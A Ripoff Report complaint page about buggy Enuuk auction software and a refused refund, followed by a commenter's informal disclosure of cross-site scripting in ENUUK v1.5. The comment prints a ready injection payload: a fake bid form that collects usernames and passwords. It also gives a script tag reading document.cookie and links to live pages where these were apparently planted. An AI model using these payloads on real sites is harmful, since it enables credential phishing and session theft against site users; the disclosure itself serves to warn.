Ripoff Report Needs Your Help!
X  |  CLOSE
Report: #496928

Complaint Review: Enuuk - Internet

  • Submitted:
  • Updated:
  • Reported By: The Numismatic Dealers Den — USA
  • Author Not Confirmed What's this?
  • Why?
  • Enuuk www.numismaticdealers.net Internet United States of America

Enuuk PhpAuction Beware of the product Enuuk (auction software). The program is frought with bugs and the vendor will not refund your money unless you give them your domain name Internet

*Consumer Comment: Bugs on ENUUK

Show customers why they should trust your business over your competitors...

Is this
Report about YOU
listed on other sites?
Those sites steal
Ripoff Report's
content.
We can get those
removed for you!
Find out more here.
How to fix
Ripoff Report
If your business is
willing to make a
commitment to
customer satisfaction
Click here now..

In August my organization spend $945 to purchase Enuuk- what was advertised as a premier auction software soultion. From the day the software was istalled, there was nothing but bugs- big bugs. For instance, the software did not show the correct time remaining and members consistently got fatal error messages. The vendor then insisted that they upgrade it to the new version (which they released the day after I sent it 5 bugs notices). They upgraded it and still more bugs showed. They even send me an email saying another version was avialable and provided insutrctions on upgrading. That upgrade failed and more bugs showed. When I told them I had enough and I wated my money back, they told me that these bugs were my problem and they won't give me my money back unless I gave up my domain name- even though in the beginning we agreed that they would not ask for my domain name if the product was faulty. See www.enuuk.org for a complete list of the bugs that I have found. I have since needed resort calling and asking my credit card company to help. I am writing this in hopes others don't fall into the trap. They are either in Mexico or Spain so I have little other recourse other than that.

This report was posted on Ripoff Report on 09/18/2009 10:42 AM and is a permanent record located here: https://www.ripoffreport.com/reports/enuuk/internet/enuuk-phpauction-beware-of-the-product-enuuk-auction-software-the-program-is-frought-w-496928. The posting time indicated is Arizona local time. Arizona does not observe daylight savings so the post time may be Mountain or Pacific depending on the time of year. Ripoff Report has an exclusive license to this report. It may not be copied without the written permission of Ripoff Report. READ: Foreign websites steal our content

Search for additional reports

If you would like to see more Rip-off Reports on this company/individual, search here:

Report & Rebuttal
Respond to this report!
What's this?
Also a victim?
What's this?
Repair Your Reputation!
What's this?

Updates & Rebuttals

REBUTTALS & REPLIES:
0Author
1Consumer
0Employee/Owner

#1 Consumer Comment

Bugs on ENUUK

AUTHOR: roboteto - (United States of America)

POSTED: Sunday, November 22, 2009
Roboteto Security Advisor's
=====================

XSS Attacks on ENUUK V 1.5
Input Validation Error on ENUUK, Cross Site Scripting on any auction.

Please see the demo on Sunday 22 de November
http://www.phpauction.net/enuuk-auction-platform/offer/details/8  (alternate form validator)
http://www.phpauction.net/enuuk-auction-platform/offer/details/7  (document.cookie)
http://www.phpauction.net/enuuk-auction-platform/  (alerts on nickname)

You can introduce any HTML tag on textareas (before disabling Javascript option on navigator).

You can put a form like this:
A hack to this website and all websites with ENUUK (without quotes):

<div>A hack to this website and all websites with ENUUK:

<div width=800 height=400 style=background-color:#faa>
<h3>To bid please, fill this form (please, be sure that is your password)</h3><br>
<form name=form method=get class=header-login action=http://www.phpauction.net/enuuk-auction-platform/offer/edit/8>
User: <input name=login type=text><br><br>
Password <input name=passwd type=password><br><br>
<a class=button href=javascript:void() >=document.form.submit();>Bid this! <img src=themes/default/img/buttonArrow.gif></a><br><br>

</form>
</div>
You can introduce on any input form a <script> tag, that allows you to javascript injection:

  Introduce your name: roboteto<script>alert(document.cookie);</script>

Author:
 These vulnerabilities have been found and released without any damages for ENUUK or its customers by
  Roboteto.
  You can find me at roboteto[AT|NOSPAM]hotmail[DOT|NOTSPAM]es for securing your sites.


Sincerely,

  Roboteto.
Respond to this report!
What's this?
Featured Reports

Advertisers above have met our
strict standards for business conduct.

X
What do hackers,
questionable attorneys and
fake court orders have in common?
...Dishonest Reputation Management Investigates Reputation Repair
Free speech rights compromised

WATCH News
Segment Now